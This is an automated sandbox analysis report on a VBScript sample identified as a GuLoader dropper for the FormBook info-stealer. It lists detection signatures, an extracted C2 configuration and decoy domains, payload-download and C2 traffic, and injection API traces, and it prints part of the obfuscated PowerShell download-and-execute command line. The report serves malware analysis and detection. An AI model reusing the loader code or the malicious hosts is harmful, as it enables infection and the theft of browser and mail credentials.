Windows Analysis Report
birectangular.vbs

Overview

General Information

Sample name: birectangular.vbs
Analysis ID: 1466597
MD5: be6f44242b4afd0e61d775b9ef7946b0
SHA1: 80ce71becc7fb1203a43708d7e3fdcad778bb79e
SHA256: 8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59
Tags: vbs

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Searches for Windows Mail specific files
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Browser Data Stealing
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.x6hk8.com/dd01/"], "decoy": ["1prostitutki-chelyabinska.com", "o2v7c.rest", "something-organized.com", "etc99.store", "perksaccess.contact", "consuyt.xyz", "dscmodelpapers.com", "dana88.lat", "dumange.com", "pointlomabarreboutique.com", "djtmaga.net", "dentisttanger.com", "17251604.com", "dogcatshoponline.com", "eppgrandeur.com", "jyty3500.com", "felixkang.asia", "xn--22ck2ci1dl0f7b7h.com", "milliesrecruitment.com", "www333804000.com", "g90luv.vip", "glamourverde.store", "tzbgs.com", "alpha-wealth.club", "homestreamztv.com", "alignedinvestment.com", "ragwash.com", "ultrakan.xyz", "clearconceptslearning.com", "explorewithnor.com", "d-b-d.com", "saltdrink.com", "55957462.com", "limbicmindset.com", "baldomerotienda.com", "yh-9.xyz", "easyskinz.xyz", "lovefulmindfulness.com", "030303-11122222.cloud", "sunpulse.store", "rescapital.world", "payizadlt.com", "cindcxyshirts.shop", "vnddq.biz", "pvywgx235i.top", "www708cc.vip", "poa88koi.lol", "aseasyas1234inc.net", "ygudk.biz", "tmdirtbikes.com", "bqzprvkljhwtmnxy.net", "qk09.top", "aiatlant.com", "zayinvest.com", "intermediafx.com", "lemonlight.fun", "eurovisfilo.com", "bluefrazer.com", "835000suns.com", "checkonly.net", "bs2bestat.net", "praywithus.space", "huafu.site", "radleyhealth.com"]}
Source: Yara match File source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C90115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free, 25_2_00C90115
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8FD30 CryptExportKey,GetLastError,malloc,CryptExportKey,GetLastError,free, 25_2_00C8FD30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8DAFB CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 25_2_00C8DAFB
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8FA58 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGenKey,GetLastError,GetLastError, 25_2_00C8FA58
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8FE35 CryptBinaryToStringW,GetLastError,malloc,CryptBinaryToStringW,GetLastError,free,SysFreeString, 25_2_00C8FE35
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C90383 __EH_prolog3_GS,SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString, 25_2_00C90383
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8FF58 CryptStringToBinaryW,GetLastError,malloc,CryptStringToBinaryW,GetLastError, 25_2_00C8FF58
Source: unknown HTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.1845941014.00000000073D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Management.Automation.pdb source: powershell.exe, 00000010.00000002.1845941014.0000000007324000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, raserver.exe
Source: Binary string: RAServer.pdb source: raserver.exe
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\raserver.exe Code function: 4x nop then pop edi 25_2_001E6CD2

Networking

Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49708 -> 46.23.69.44:80
Source: C:\Windows\explorer.exe Network Connect: 46.23.69.44 80
Source: Malware configuration extractor URLs: www.x6hk8.com/dd01/
Source: DNS query: www.yh-9.xyz
Source: global traffic HTTP traffic detected: GET /dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g== HTTP/1.1Host: www.alignedinvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 46.23.69.44 46.23.69.44
Source: Joe Sandbox View ASN Name: UK2NET-ASGB UK2NET-ASGB
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 22_2_0B313F82 getaddrinfo,setsockopt,recv, 22_2_0B313F82
Source: global traffic HTTP traffic detected: GET /Negus85.csv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: larryfrank.cpaConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xdKCjAMEQDWiUiQMPQ170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: larryfrank.cpaCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: larryfrank.cpa
Source: global traffic DNS traffic detected: DNS query: www.alignedinvestment.com
Source: global traffic DNS traffic detected: DNS query: www.yh-9.xyz
Source: unknown HTTP traffic detected: POST /dd01/ HTTP/1.1Host: www.alignedinvestment.comConnection: closeContent-Length: 144589Cache-Control: no-cacheOrigin: http://www.alignedinvestment.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.alignedinvestment.com/dd01/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: powershell.exe, 0000000C.00000002.2097671228.000001A8DDA95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsh
Source: wscript.exe, 00000000.00000003.1369707931.0000020475128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.0000020475129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.1371449760.0000020477690000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1369707931.0000020475128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.0000020475129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1244435885.000002047770E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244926036.0000020477736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1336ccf7ad6f7
Source: wscript.exe, 00000000.00000003.1244762105.00000204776EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244638102.00000204776C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1336ccf7ad
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C72C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://larryfrank.cpa
Source: powershell.exe, 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C54D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C54D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.c
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cp
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C56F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/N
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Ne
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Neg
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negu
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus8
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.c
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.cs
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C56F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.csv
Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.csvXR
Source: powershell.exe, 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown HTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49707 version: TLS 1.2

E-Banking Fraud

Source: Yara match File source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C90115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free, 25_2_00C90115
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C90383 __EH_prolog3_GS,SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString, 25_2_00C90383

System Summary

Source: C:\Windows\SysWOW64\raserver.exe Dropped file: C:\Users\user\AppData\Roaming\834O80R0\834logri.ini
Source: C:\Windows\SysWOW64\raserver.exe Dropped file: C:\Users\user\AppData\Roaming\834O80R0\834logrv.ini
Source: amsi32_7748.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000016.00000002.2539715422.000000000B32B000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Initial file: Mythopoet.ShellExecute akademiseringerne,Kritrima,"","" ,Sennesblgenes
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6618
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462AD0 NtReadFile,LdrInitializeThunk, 20_2_22462AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 20_2_22462BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462E80 NtReadVirtualMemory,LdrInitializeThunk, 20_2_22462E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 20_2_22462EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462F30 NtCreateSection,LdrInitializeThunk, 20_2_22462F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462FE0 NtCreateFile,LdrInitializeThunk, 20_2_22462FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462F90 NtProtectVirtualMemory,LdrInitializeThunk, 20_2_22462F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462FB0 NtResumeThread,LdrInitializeThunk, 20_2_22462FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462C70 NtFreeVirtualMemory,LdrInitializeThunk, 20_2_22462C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462CA0 NtQueryInformationToken,LdrInitializeThunk, 20_2_22462CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462D10 NtMapViewOfSection,LdrInitializeThunk, 20_2_22462D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462D30 NtUnmapViewOfSection,LdrInitializeThunk, 20_2_22462D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462DD0 NtDelayExecution,LdrInitializeThunk, 20_2_22462DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462DF0 NtQuerySystemInformation,LdrInitializeThunk, 20_2_22462DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22464340 NtSetContextThread, 20_2_22464340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22463010 NtOpenDirectoryObject, 20_2_22463010
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22463090 NtSetValueKey, 20_2_22463090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22464650 NtSuspendThread, 20_2_22464650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224635C0 NtCreateMutant, 20_2_224635C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462AF0 NtWriteFile, 20_2_22462AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462AB0 NtWaitForSingleObject, 20_2_22462AB0
